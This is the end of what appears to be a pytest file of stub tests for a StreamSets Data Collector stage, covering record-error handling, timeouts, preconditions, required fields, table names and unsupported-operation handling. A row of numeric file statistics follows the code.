@pytest.mark.parametrize('stage_attributes', [{'on_record_error': 'DISCARD'},
{'on_record_error': 'STOP_PIPELINE'},
{'on_record_error': 'TO_ERROR'}])
def test_on_record_error(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_operation_timeout_in_milliseconds(sdc_builder, sdc_executor):
pass
@stub
def test_preconditions(sdc_builder, sdc_executor):
pass
@stub
def test_required_fields(sdc_builder, sdc_executor):
pass
@stub
def test_table_name(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'unsupported_operation_handling': 'DISCARD'},
{'unsupported_operation_handling': 'SEND_TO_ERROR'},
{'unsupported_operation_handling': 'USE_DEFAULT'}])
def test_unsupported_operation_handling(sdc_builder, sdc_executor, stage_attributes):
pass
| 29.065217 | 98 | 0.620045 | 267 | 2,674 | 5.775281 | 0.265918 | 0.063554 | 0.118029 | 0.190661 | 0.501297 | 0.501297 | 0.501297 | 0.475357 | 0.354086 | 0.354086 | 0 | 0 | 0.28347 | 2,674 | 91 | 99 | 29.384615 | 0.804802 | 0 | 0 | 0.459016 | 0 | 0 | 0.209502 | 0.03367 | 0 | 0 | 0 | 0 | 0 | 1 | 0.229508 | false | 0.229508 | 0.032787 | 0 | 0.262295 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.